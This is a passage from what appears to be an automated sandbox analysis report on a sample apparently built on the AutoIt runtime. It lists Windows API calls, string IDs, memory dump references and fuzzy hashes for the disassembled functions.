                                          • _wcslen.LIBCMT ref: 00ED0A8A
                                          • _wcslen.LIBCMT ref: 00ED0B06
                                          • _wcslen.LIBCMT ref: 00ED0B81
                                            • Part of subcall function 00E5F9F2: _wcslen.LIBCMT ref: 00E5F9FD
                                            • Part of subcall function 00EA2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EA2BFA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                          • API String ID: 1103490817-4258414348
                                          • Opcode ID: 322b61fa44fd1eb41f2c29b5514e0b887b756f3fdc3d3aa6bc557a8a5a56c23d
                                          • Instruction ID: 59977e36a3b3fb5cc884f906914e8222ba72c78ddf761ae62fc1f5816673bdd2
                                          • Opcode Fuzzy Hash: 322b61fa44fd1eb41f2c29b5514e0b887b756f3fdc3d3aa6bc557a8a5a56c23d
                                          • Instruction Fuzzy Hash: DDE15C316087019FC714DF24C450A6AB7E2FF98318F18595EF8966B3A2D731ED46DB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$BuffCharUpper
                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                          • API String ID: 1256254125-909552448
                                          • Opcode ID: 3a31276eab0cf72c76dda2a4f92c78e69c1d00d5436ed6bf87cbc5fea8913ee1
                                          • Instruction ID: 1f6345e48e902dd0a2c0449419dd776b1305353a85f2916a2679c3acba92258d
                                          • Opcode Fuzzy Hash: 3a31276eab0cf72c76dda2a4f92c78e69c1d00d5436ed6bf87cbc5fea8913ee1
                                          • Instruction Fuzzy Hash: 3571EA32A0052A8BCB10DE7CDA41FBB73919BA4758B35252CFC5EB7285E632DD46D350
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _wcslen.LIBCMT ref: 00ED835A
                                          • _wcslen.LIBCMT ref: 00ED836E
                                          • _wcslen.LIBCMT ref: 00ED8391
                                          • _wcslen.LIBCMT ref: 00ED83B4
                                          • LoadImageW.USER32 ref: 00ED83F2
                                          • LoadLibraryExW.KERNEL32 ref: 00ED844E
                                          • LoadImageW.USER32 ref: 00ED8487
                                          • LoadImageW.USER32 ref: 00ED84CA
                                          • LoadImageW.USER32 ref: 00ED8501
                                          • FreeLibrary.KERNEL32 ref: 00ED850D
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ED851D
                                          • DestroyIcon.USER32(?,?,?,?,?,00ED5BF2), ref: 00ED852C
                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00ED8549
                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00ED8555
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                          • String ID: .dll$.exe$.icl
                                          • API String ID: 799131459-1154884017
                                          • Opcode ID: 4db1fb0400f97f3093d8ea484c7ccd6c2d8cfbb42ba5bee7f5ee0f8e2bd59adc
                                          • Instruction ID: 556a943fe3b21afc1117bc1a1e963ad7e1c92e7f77b652010cc43b7539b83df5
                                          • Opcode Fuzzy Hash: 4db1fb0400f97f3093d8ea484c7ccd6c2d8cfbb42ba5bee7f5ee0f8e2bd59adc
                                          • Instruction Fuzzy Hash: 29610171940216BEEB14DF64ED41BBF77A8FB04B51F10560AF815F62D0DB74A981C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 0-1645009161
                                          • Opcode ID: ec200f0b855b989b9dd320f260695699e997ddf638e47dc8b4ceeb441ebd9a81
                                          • Instruction ID: 35380326381e831f8450b4f25175fd647433452b2d318bee3166df6c9ebf3f1e
                                          • Opcode Fuzzy Hash: ec200f0b855b989b9dd320f260695699e997ddf638e47dc8b4ceeb441ebd9a81
                                          • Instruction Fuzzy Hash: CD811471A40605BBDB20AF60EC46FAE77A8EF14340F006426F949BA292EF71D911C7D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00E600C6
                                            • Part of subcall function 00E600ED: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00E6011C
                                            • Part of subcall function 00E600ED: GetModuleHandleW.KERNEL32 ref: 00E60127
                                            • Part of subcall function 00E600ED: GetModuleHandleW.KERNEL32 ref: 00E60138
                                            • Part of subcall function 00E600ED: GetProcAddress.KERNEL32 ref: 00E6014E
                                            • Part of subcall function 00E600ED: GetProcAddress.KERNEL32 ref: 00E6015C
                                            • Part of subcall function 00E600ED: GetProcAddress.KERNEL32 ref: 00E6016A
                                            • Part of subcall function 00E600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E60195
                                            • Part of subcall function 00E600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E601A0
                                          • ___scrt_fastfail.LIBCMT ref: 00E600E7
                                            • Part of subcall function 00E600A3: __onexit.LIBCMT ref: 00E600A9
                                          Strings
                                          • SleepConditionVariableCS, xrefs: 00E60154
                                          • WakeAllConditionVariable, xrefs: 00E60162
                                          • InitializeConditionVariable, xrefs: 00E60148
                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E60122
                                          • kernel32.dll, xrefs: 00E60133
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                          • API String ID: 66158676-1714406822
                                          • Opcode ID: a7645e602b5c32d63f77dcf0cb2204b227bd1783a8071797e39ed93401b418ba
                                          • Instruction ID: 3e7d46bf459501383869cd68b77511736f2309d770a671cf2e9054a1c1f2cc77
                                          • Opcode Fuzzy Hash: a7645e602b5c32d63f77dcf0cb2204b227bd1783a8071797e39ed93401b418ba
                                          • Instruction Fuzzy Hash: 2121F9326867266FD7105BA5BC06B6B33E5DB06BE1F10552BF902F32D1DFA09804CA91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 176396367-1603158881
                                          • Opcode ID: 349e6b88fbb4a2462886f3a671c6634c9a5a465f506f4ee1a77295b9269de164
                                          • Instruction ID: c0234be5378886f56790b59e41c73248ef3c9f871bc5a810344fa9b7e6e263bf
                                          • Opcode Fuzzy Hash: 349e6b88fbb4a2462886f3a671c6634c9a5a465f506f4ee1a77295b9269de164
                                          • Instruction Fuzzy Hash: 4FE1E431A005169BCB189FB8C4517EEFBB0BF5E754F14A119F466BB240DB30BE899B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$BuffCharDriveLowerType
                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                          • API String ID: 2055661098-1000479233
                                          • Opcode ID: 9279262e0fd6c007970a37ecfd89a055c6e3e4dff292c85e71ef11102b56c231
                                          • Instruction ID: 55f69feb1f740363d48bc1a0a36ea8ab85d7af3c303d7d6969fe606b4a92affb
                                          • Opcode Fuzzy Hash: 9279262e0fd6c007970a37ecfd89a055c6e3e4dff292c85e71ef11102b56c231
                                          • Instruction Fuzzy Hash: 9CB112B16083029FC710DF28D890AABB7E5AFA5764F50691DF496E72D2DB30D844CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _wcslen.LIBCMT ref: 00ECB198
                                          • GetSystemDirectoryW.KERNEL32 ref: 00ECB1B0
                                          • GetSystemDirectoryW.KERNEL32 ref: 00ECB1D4
                                          • _wcslen.LIBCMT ref: 00ECB200
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ECB214
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ECB236
                                          • _wcslen.LIBCMT ref: 00ECB332
                                            • Part of subcall function 00EB05A7: GetStdHandle.KERNEL32(000000F6), ref: 00EB05C6
                                          • _wcslen.LIBCMT ref: 00ECB34B
                                          • _wcslen.LIBCMT ref: 00ECB366
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ECB3B6
                                          • GetLastError.KERNEL32 ref: 00ECB407
                                          • CloseHandle.KERNEL32(?), ref: 00ECB439
                                          • CloseHandle.KERNEL32(00000000), ref: 00ECB44A
                                          • CloseHandle.KERNEL32(00000000), ref: 00ECB45C
                                          • CloseHandle.KERNEL32(00000000), ref: 00ECB46E
                                          • CloseHandle.KERNEL32(?), ref: 00ECB4E3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                          • String ID:
                                          • API String ID: 2178637699-0
                                          • Opcode ID: e2530435d32a94b53fd5183d6eb78a4765474723a1b5d5c18468cd34cf94f228
                                          • Instruction ID: dce77466a729df91e970f1096f030c4562abbc21dc1dc3e8d5a18bc0250a01b3
                                          • Opcode Fuzzy Hash: e2530435d32a94b53fd5183d6eb78a4765474723a1b5d5c18468cd34cf94f228
                                          • Instruction Fuzzy Hash: EEF18B315083409FC714EF24D982B6EBBE5AF85314F14995DF899AB2A2DB32EC05CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetMenuItemCount.USER32(00F11990), ref: 00E82F8D
                                          • GetMenuItemCount.USER32(00F11990), ref: 00E8303D
                                          • GetCursorPos.USER32(?), ref: 00E83081
                                          • SetForegroundWindow.USER32(00000000), ref: 00E8308A
                                          • TrackPopupMenuEx.USER32 ref: 00E8309D
                                          • PostMessageW.USER32 ref: 00E830A9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                          • String ID: 0
                                          • API String ID: 36266755-4108050209
                                          • Opcode ID: 3d8b691033b92f6b4d75c8e2d52f338b482308f84230c55f52b4296482977eea
                                          • Instruction ID: 7a9a8a011d81d02838b951551ba85c51959b5acc6c36ef0ce773a54ed75871d3
                                          • Opcode Fuzzy Hash: 3d8b691033b92f6b4d75c8e2d52f338b482308f84230c55f52b4296482977eea
                                          • Instruction Fuzzy Hash: 4C712730640206BEEB219F75DC49FAABF68FF05768F205206F62C7A1E1C7B1A914DB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DestroyWindow.USER32 ref: 00ED6DEB
                                            • Part of subcall function 00E46B57: _wcslen.LIBCMT ref: 00E46B6A
                                          • CreateWindowExW.USER32 ref: 00ED6E5F
                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00ED6E81
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00ED6E94
                                          • DestroyWindow.USER32 ref: 00ED6EB5
                                          • CreateWindowExW.USER32 ref: 00ED6EE4
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00ED6EFD
                                          • GetDesktopWindow.USER32 ref: 00ED6F16
                                          • GetWindowRect.USER32(00000000), ref: 00ED6F1D
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00ED6F35
                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00ED6F4D
                                            • Part of subcall function 00E59944: GetWindowLongW.USER32(?,000000EB), ref: 00E59952
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                          • String ID: 0$tooltips_class32
                                          • API String ID: 2429346358-3619404913
                                          • Opcode ID: cbef19aa3a87c2214e867928736868d2d434d86ec1de6e009b074adb13ef6e0c
                                          • Instruction ID: 1e43ce2644ea6f63cd23bad9fbe59453255449de5e3d6564f9c703f7b1bb78e3
                                          • Opcode Fuzzy Hash: cbef19aa3a87c2214e867928736868d2d434d86ec1de6e009b074adb13ef6e0c
                                          • Instruction Fuzzy Hash: 2E718B70204245AFDB21CF18DC44EAABBF9FB89708F54541EF999A7361C770E90ADB12
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E59BB2
                                          • DragQueryPoint.SHELL32(?,?), ref: 00ED9147
                                            • Part of subcall function 00ED7674: ClientToScreen.USER32(?,?), ref: 00ED769A
                                            • Part of subcall function 00ED7674: GetWindowRect.USER32(?,?), ref: 00ED7710
                                            • Part of subcall function 00ED7674: PtInRect.USER32(?,?,00ED8B89), ref: 00ED7720
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00ED91B0
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00ED91BB
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00ED91DE
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00ED9225
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00ED923E
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00ED9255
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00ED9277
                                          • DragFinish.SHELL32(?), ref: 00ED927E
                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00ED9371
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                          • API String ID: 221274066-3440237614
                                          • Opcode ID: 5ee885da093f8bf8c6aad13e050561aaf9292866d6ecaf37e836697b27ad8586
                                          • Instruction ID: b2c69659bdd4815b81c42efd767a75b4526a7afe87e89616d96b9263d2be3a1f
                                          • Opcode Fuzzy Hash: 5ee885da093f8bf8c6aad13e050561aaf9292866d6ecaf37e836697b27ad8586
                                          • Instruction Fuzzy Hash: E2617C71108301AFD701DF55EC85DAFBBE8EF88750F50191EF5A5A32A1DB309A49CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EBC4B0
                                          • GetLastError.KERNEL32 ref: 00EBC4C3
                                          • SetEvent.KERNEL32 ref: 00EBC4D7
                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EBC4F0
                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00EBC533
                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EBC549
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EBC554
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EBC584
                                          • GetLastError.KERNEL32 ref: 00EBC5DC
                                          • SetEvent.KERNEL32 ref: 00EBC5F0
                                          • InternetCloseHandle.WININET(00000000), ref: 00EBC5FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                          • String ID:
                                          • API String ID: 3800310941-3916222277
                                          • Opcode ID: 5347f39de38aadec8f766a28d7e098bec8ceb16b7426ce7b4ab496769733773b
                                          • Instruction ID: ba4c642f51cca2e5588d567d9bb1f1a174c80fd78523b2413672bf95ae157614
                                          • Opcode Fuzzy Hash: 5347f39de38aadec8f766a28d7e098bec8ceb16b7426ce7b4ab496769733773b
                                          • Instruction Fuzzy Hash: F6516FB0505609BFDB218F61D988AEB7BFCFF08788F20541AF945E6110DB30E948DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00ED8592
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00ED85A2
                                          • GlobalAlloc.KERNEL32 ref: 00ED85AD
                                          • CloseHandle.KERNEL32(00000000), ref: 00ED85BA
                                          • GlobalLock.KERNEL32 ref: 00ED85C8
                                          • ReadFile.KERNEL32 ref: 00ED85D7
                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00ED85E0
                                          • CloseHandle.KERNEL32(00000000), ref: 00ED85E7
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0), ref: 00ED85F8
                                          • OleLoadPicture.OLEAUT32 ref: 00ED8611
                                          • GlobalFree.KERNEL32 ref: 00ED8621
                                          • GetObjectW.GDI32 ref: 00ED8641
                                          • CopyImage.USER32 ref: 00ED8671
                                          • DeleteObject.GDI32(?), ref: 00ED8699
                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00ED86AF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                          • String ID:
                                          • API String ID: 3840717409-0
                                          • Opcode ID: 670f6d1d2c84e65b3ef72af4b1388a66ec853bf59af8790587e501142431052c
                                          • Instruction ID: 2b6c321261d40578cf546b029dcc050abcf2ded06488a28d6b3772cf8db8799a
                                          • Opcode Fuzzy Hash: 670f6d1d2c84e65b3ef72af4b1388a66ec853bf59af8790587e501142431052c
                                          • Instruction Fuzzy Hash: 4E415B71601205AFDB10CFA6ED48EAE7BBCEF89B55F10415AF815E72A0DB309905CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                          • API String ID: 1234038744-3931177956
                                          • Opcode ID: 03b1e3dda0927f4d2ecb1bfb146a1bed2c26be39c9a87ad14a19a7415f0308ce
                                          • Instruction ID: a85e244d679b2dfd034a641c4ca818b432d4472f6539c324ce85b55ae84dfb65
                                          • Opcode Fuzzy Hash: 03b1e3dda0927f4d2ecb1bfb146a1bed2c26be39c9a87ad14a19a7415f0308ce
                                          • Instruction Fuzzy Hash: B9D10132A01215DBCB209F65E8A4BFAB7F5BF45720FA49596F806BB180DB30DC44DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                            • Part of subcall function 00ECC998: CharUpperBuffW.USER32(?,?), ref: 00ECC9B5
                                            • Part of subcall function 00ECC998: _wcslen.LIBCMT ref: 00ECC9F1
                                            • Part of subcall function 00ECC998: _wcslen.LIBCMT ref: 00ECCA68
